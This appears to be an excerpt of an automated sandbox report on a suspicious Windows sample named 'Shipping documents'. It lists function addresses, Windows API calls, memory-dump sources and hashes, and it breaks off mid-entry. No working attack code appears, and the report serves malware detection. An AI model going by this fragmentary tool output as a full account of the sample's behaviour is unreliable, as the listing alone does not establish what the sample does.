                                                                                                          • Opcode ID: bd199fa730e01bd6eb844f10b5a9d2666f16aab98b040269f67dcb89f4e9aede
                                                                                                          • Instruction ID: fadcceb5308e48970113ceaff65c18732520a09434288b0a98514d96d8681c7b
                                                                                                          • Opcode Fuzzy Hash: bd199fa730e01bd6eb844f10b5a9d2666f16aab98b040269f67dcb89f4e9aede
                                                                                                          • Instruction Fuzzy Hash: 65510772E001046BD710EF69DC85FAEB3A8EB94320F14856EF905D7381EA35DD41C7A5
                                                                                                          Function 004443FC Relevance: 10.7, APIs: 7, Instructions: 170windowCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • GetParent.USER32(?), ref: 0044443B
                                                                                                          • GetKeyboardState.USER32(?), ref: 00444450
                                                                                                          • SetKeyboardState.USER32(?), ref: 004444A4
                                                                                                          • PostMessageW.USER32(?,00000101,00000010,?), ref: 004444D4
                                                                                                          • PostMessageW.USER32(?,00000101,00000011,?), ref: 004444F5
                                                                                                          • PostMessageW.USER32(?,00000101,00000012,?), ref: 00444541
                                                                                                          • PostMessageW.USER32(?,00000101,0000005B,?), ref: 00444566
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: MessagePost$KeyboardState$Parent
                                                                                                          • String ID:
                                                                                                          • API String ID: 87235514-0
                                                                                                          • Opcode ID: 4481168041494e1849bbb8b05fe85edf3de4190132d6f0e43f59e21d2d662a19
                                                                                                          • Instruction ID: 8f44bbd55e3387c5fecf3766ecc31f273ddc6601011f0052083f6d8a5cbafb33
                                                                                                          • Opcode Fuzzy Hash: 4481168041494e1849bbb8b05fe85edf3de4190132d6f0e43f59e21d2d662a19
                                                                                                          • Instruction Fuzzy Hash: 2051D6A05047D53AFB3682748846BA7BFE42F86704F08868BE1D5559C3D3ECE994CB68
                                                                                                          Function 004445F4 Relevance: 10.7, APIs: 7, Instructions: 170windowCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • GetParent.USER32(?), ref: 00444633
                                                                                                          • GetKeyboardState.USER32(?), ref: 00444648
                                                                                                          • SetKeyboardState.USER32(?), ref: 0044469C
                                                                                                          • PostMessageW.USER32(?,00000100,00000010,?), ref: 004446C9
                                                                                                          • PostMessageW.USER32(?,00000100,00000011,?), ref: 004446E7
                                                                                                          • PostMessageW.USER32(?,00000100,00000012,?), ref: 00444730
                                                                                                          • PostMessageW.USER32(?,00000100,0000005B,?), ref: 00444752
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: MessagePost$KeyboardState$Parent
                                                                                                          • String ID:
                                                                                                          • API String ID: 87235514-0
                                                                                                          • Opcode ID: 988eb571eba6180a4ec7f7c38e49780efe397f424a6b2059308ac6c1f0666447
                                                                                                          • Instruction ID: 3b822c4357a53f38689f34ecdfb8cd013e642acfd09065eaf4f6fa9230d15588
                                                                                                          • Opcode Fuzzy Hash: 988eb571eba6180a4ec7f7c38e49780efe397f424a6b2059308ac6c1f0666447
                                                                                                          • Instruction Fuzzy Hash: 7451D4B05047D139F73692688C45BA7BFD86B8B304F08868FF1D5156C2D3ACB895CB69
                                                                                                          Function 0045537F Relevance: 10.6, APIs: 7, Instructions: 149windowCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • SendMessageW.USER32(?,00001308,?,00000000), ref: 0045539F
                                                                                                          • ImageList_Remove.COMCTL32(?,?), ref: 004553D3
                                                                                                          • SendMessageW.USER32(?,0000133D,?,00000002), ref: 004554BB
                                                                                                          • DeleteObject.GDI32(?), ref: 00455736
                                                                                                          • DeleteObject.GDI32(?), ref: 00455744
                                                                                                          • DestroyIcon.USER32(?), ref: 00455752
                                                                                                          • DestroyWindow.USER32(?), ref: 00455760
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: DeleteDestroyMessageObjectSend$IconImageList_RemoveWindow
                                                                                                          • String ID:
                                                                                                          • API String ID: 2354583917-0
                                                                                                          • Opcode ID: 35278296b08b7a07ab4037b75477043e0b107217007b5923df3ad7b8258325fa
                                                                                                          • Instruction ID: c6eb43681ca9132c11a6020d2ba108f27148fdc9c8ef1f50c91adec3b3f4716e
                                                                                                          • Opcode Fuzzy Hash: 35278296b08b7a07ab4037b75477043e0b107217007b5923df3ad7b8258325fa
                                                                                                          • Instruction Fuzzy Hash: 76516B74204A419FC714DF24C4A4BB677F5FF8A302F1486AAED998B392D738A849CB54
                                                                                                          Function 00464812 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 145libraryloaderCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • LoadLibraryW.KERNEL32(00000000,?,?,?), ref: 0046485D
                                                                                                          • GetProcAddress.KERNEL32(?,?), ref: 004648F7
                                                                                                          • GetProcAddress.KERNEL32(?,00000000), ref: 00464916
                                                                                                          • GetProcAddress.KERNEL32(?,?), ref: 0046495A
                                                                                                          • FreeLibrary.KERNEL32(?,?,?,?), ref: 0046497C
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: AddressProc$Library$FreeLoad
                                                                                                          • String ID: #v
                                                                                                          • API String ID: 2449869053-554117064
                                                                                                          • Opcode ID: 178b694003ef1c8c6ddf6c03964e3c93f4f33891ff2eeadba8088ba5e41252f8
                                                                                                          • Instruction ID: 8919579e2c9fc9b2d94c4928dd3202a5bdd7863bc063e44bf2a6fba2f1eed130
                                                                                                          • Opcode Fuzzy Hash: 178b694003ef1c8c6ddf6c03964e3c93f4f33891ff2eeadba8088ba5e41252f8
                                                                                                          • Instruction Fuzzy Hash: 2351BF756002049FCB00EFA4C985A9EB7B4EF88304F14856EFD05AB392DB79ED45CB99
                                                                                                          Function 0044982A Relevance: 10.6, APIs: 7, Instructions: 135COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 3e9aeaa8e8d9a9efa26880ce8322a829618f36bb2b0e75f2f32cf9c77c57eef6
                                                                                                          • Instruction ID: 5d193f65ffce5f3a1406795a0d9a37a93f2f4887bdc9b14e5c8c629f49d9966a
                                                                                                          • Opcode Fuzzy Hash: 3e9aeaa8e8d9a9efa26880ce8322a829618f36bb2b0e75f2f32cf9c77c57eef6
                                                                                                          • Instruction Fuzzy Hash: 0A413871900114ABE710DF58CC84FAF7765EB46320F14826EF858AB3C1C7745D02EB98
                                                                                                          Function 0045D448 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 83COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • SetErrorMode.KERNEL32(00000001), ref: 0045D459
                                                                                                          • GetVolumeInformationW.KERNEL32(?,?,000000FF,?,?,?,?,000000FF,?), ref: 0045D4CF
                                                                                                          • __swprintf.LIBCMT ref: 0045D4E9
                                                                                                          • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D52D
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ErrorMode$InformationVolume__swprintf
                                                                                                          • String ID: %lu$\VH
                                                                                                          • API String ID: 3164766367-2432546070
                                                                                                          • Opcode ID: 886de82fe176795aba7bdb97f378ec25336d41d961a023bcb5d27bbb6add7ed5
                                                                                                          • Instruction ID: a5bcfc38f1a54d16d783223dfbe865d4bc924dff4e6617147b97584b2165572c
                                                                                                          • Opcode Fuzzy Hash: 886de82fe176795aba7bdb97f378ec25336d41d961a023bcb5d27bbb6add7ed5
                                                                                                          • Instruction Fuzzy Hash: 11317171A00209AFCB14EF95DD85EAEB7B8FF48304F1084AAF905A7291D774EA45CB94
                                                                                                          Function 00450B7C Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 80windowCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00450BE7
                                                                                                          • SendMessageW.USER32(00000000,00000409,00000000,FF000000), ref: 00450BF8
                                                                                                          • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00450C06
                                                                                                          • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00450C17
                                                                                                          • SendMessageW.USER32(00000000,00000404,00000001,00000000), ref: 00450C25
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: MessageSend
                                                                                                          • String ID: Msctls_Progress32
                                                                                                          • API String ID: 3850602802-3636473452
                                                                                                          • Opcode ID: bde72abdda352e35c3e71b9276821fa19048fea6f3879b5342d5f34549d04d22
                                                                                                          • Instruction ID: 3e9a69ee1b5e3cb2ffa50bc712587bba9ef5757239c838e11c91c46d95a842ac
                                                                                                          • Opcode Fuzzy Hash: bde72abdda352e35c3e71b9276821fa19048fea6f3879b5342d5f34549d04d22
                                                                                                          • Instruction Fuzzy Hash: 7A21667135030477EB20DEA9DC82F97B3AD9F94B24F21460AFB54A72D1C5B5F8418B58
                                                                                                          Function 00455531 Relevance: 10.6, APIs: 7, Instructions: 75windowCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Destroy$DeleteImageList_ObjectWindow$Icon
                                                                                                          • String ID:
                                                                                                          • API String ID: 3985565216-0
                                                                                                          • Opcode ID: 49ccd75876ce99cd15ee405d1ac93d8c116bb45471ccb95599c5d22b34275644
                                                                                                          • Instruction ID: 510e71718d61fb01ae158a6e5fa7ad280301b7661e5b3aef53c80a3471921dd4
                                                                                                          • Opcode Fuzzy Hash: 49ccd75876ce99cd15ee405d1ac93d8c116bb45471ccb95599c5d22b34275644
                                                                                                          • Instruction Fuzzy Hash: 70217E70200A00EFCB20DF25D9D4A2A77AABF48712F10896DE906CB356D739EC45CB69
                                                                                                          Function 0041F6F9 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 68COMMONLIBRARYCODE
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • _malloc.LIBCMT ref: 0041F707
                                                                                                            • Part of subcall function 004135BB: __FF_MSGBANNER.LIBCMT ref: 004135D4
                                                                                                            • Part of subcall function 004135BB: __NMSG_WRITE.LIBCMT ref: 004135DB
                                                                                                            • Part of subcall function 004135BB: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,004115F6,?,00401BAC,?,?,?), ref: 00413600
                                                                                                          • _free.LIBCMT ref: 0041F71A
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: AllocateHeap_free_malloc
                                                                                                          • String ID: [B
                                                                                                          • API String ID: 1020059152-632041663
                                                                                                          • Opcode ID: a147dbbc68d3dd3311601ddf04658a1c9df9f8119054b67091eb48bbc5a1b0d2
                                                                                                          • Instruction ID: 066e14217b5799beb7557260d36092b09813ce611e9d099bbd870b86b34de80c
                                                                                                          • Opcode Fuzzy Hash: a147dbbc68d3dd3311601ddf04658a1c9df9f8119054b67091eb48bbc5a1b0d2
                                                                                                          • Instruction Fuzzy Hash: 0211EB32454615AACB213F75EC086DB3BA49F443A5B20053BF824CA2D1DB7C88C7C7AC
                                                                                                          Function 00413D7F Relevance: 10.6, APIs: 7, Instructions: 63threadCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • ___set_flsgetvalue.LIBCMT ref: 00413DA4
                                                                                                          • __calloc_crt.LIBCMT ref: 00413DB0
                                                                                                          • __getptd.LIBCMT ref: 00413DBD
                                                                                                          • CreateThread.KERNEL32(?,?,00413D1A,00000000,?,?), ref: 00413DF4
                                                                                                          • GetLastError.KERNEL32(?,?,?,?,?,00000000), ref: 00413DFE
                                                                                                          • _free.LIBCMT ref: 00413E07
                                                                                                          • __dosmaperr.LIBCMT ref: 00413E12
                                                                                                            • Part of subcall function 00417F77: __getptd_noexit.LIBCMT ref: 00417F77
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CreateErrorLastThread___set_flsgetvalue__calloc_crt__dosmaperr__getptd__getptd_noexit_free
                                                                                                          • String ID:
                                                                                                          • API String ID: 155776804-0
                                                                                                          • Opcode ID: 9a8a6ace70da3d00e2637234252d24079791dfe2cea1a90c5afbc93b71b6aba3
                                                                                                          • Instruction ID: a8fa495ec3ad1bcc0d525816251f0ff308f4c172cb7463a6c3574dd724ca7d0d
                                                                                                          • Opcode Fuzzy Hash: 9a8a6ace70da3d00e2637234252d24079791dfe2cea1a90c5afbc93b71b6aba3
                                                                                                          • Instruction Fuzzy Hash: 8E11E9321087066FD7107FA6DC459DB3BE8DF04775B20042FF91586292DB79D99186AC
                                                                                                          Function 00436C6E Relevance: 10.5, APIs: 7, Instructions: 49threadCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                            • Part of subcall function 00436B19: GetProcessHeap.KERNEL32(00000008,0000000C,00436C79), ref: 00436B1D
                                                                                                            • Part of subcall function 00436B19: HeapAlloc.KERNEL32(00000000), ref: 00436B24
                                                                                                          • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002), ref: 00436C88
                                                                                                          • GetCurrentProcess.KERNEL32(?,00000000), ref: 00436C91
                                                                                                          • DuplicateHandle.KERNEL32(00000000,?,00000000), ref: 00436C9A
                                                                                                          • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,00000000), ref: 00436CA6
                                                                                                          • GetCurrentProcess.KERNEL32(?,00000000,?,00000000), ref: 00436CAF
                                                                                                          • DuplicateHandle.KERNEL32(00000000,?,00000000,?,00000000), ref: 00436CB2
                                                                                                          • CreateThread.KERNEL32(00000000,00000000,Function_00036C2B,00000000,00000000,00000000), ref: 00436CCA
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                                                                          • String ID:
                                                                                                          • API String ID: 1957940570-0
                                                                                                          • Opcode ID: 3f80535c3287afe012eec8eac85a3d96c91e040866ec74b6355b9bdb3dfb6838
                                                                                                          • Instruction ID: 99b39fe8e7f3ac854e5c8e3994335d5d6f6ef2f737fc2b72a46a077924210789
                                                                                                          • Opcode Fuzzy Hash: 3f80535c3287afe012eec8eac85a3d96c91e040866ec74b6355b9bdb3dfb6838
                                                                                                          • Instruction Fuzzy Hash: A301E6753403047BD620EB65DC96F5B775CEB89B50F114819FA04DB1D1C6B5E8008B78
                                                                                                          Function 00413D1A Relevance: 10.5, APIs: 7, Instructions: 34threadCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • ___set_flsgetvalue.LIBCMT ref: 00413D20
                                                                                                            • Part of subcall function 004178AE: TlsGetValue.KERNEL32(?,00417A07,?,004115F6,?,00401BAC,?,?,?), ref: 004178B7
                                                                                                            • Part of subcall function 004178AE: TlsSetValue.KERNEL32(00000000,?,004115F6,?,00401BAC,?,?,?), ref: 004178D8
                                                                                                          • ___fls_getvalue@4.LIBCMT ref: 00413D2B
                                                                                                            • Part of subcall function 0041788E: TlsGetValue.KERNEL32(?,?,00413D30,00000000), ref: 0041789C
                                                                                                          • ___fls_setvalue@8.LIBCMT ref: 00413D3E
                                                                                                          • GetLastError.KERNEL32(00000000,?,00000000), ref: 00413D47
                                                                                                          • ExitThread.KERNEL32 ref: 00413D4E
                                                                                                          • GetCurrentThreadId.KERNEL32 ref: 00413D54
                                                                                                          • __freefls@4.LIBCMT ref: 00413D74
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Value$Thread$CurrentErrorExitLast___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4
                                                                                                          • String ID:
                                                                                                          • API String ID: 259663610-0
                                                                                                          • Opcode ID: a6f8f3d0a20f5c796c32073770e32d9df078d3112ed711158995b20890782f5b
                                                                                                          • Instruction ID: 675159a2c5a9d795bd3e19fa90b6febf5cd616b5876767659bafc4934cd781b8
                                                                                                          • Opcode Fuzzy Hash: a6f8f3d0a20f5c796c32073770e32d9df078d3112ed711158995b20890782f5b
                                                                                                          • Instruction Fuzzy Hash: 0DF0FF75504700AFC704BF72D9498CE7BB9AF48349720846EB80987222DA3DD9C2DBA9
                                                                                                          Function 004577E9 Relevance: 9.2, APIs: 6, Instructions: 217COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
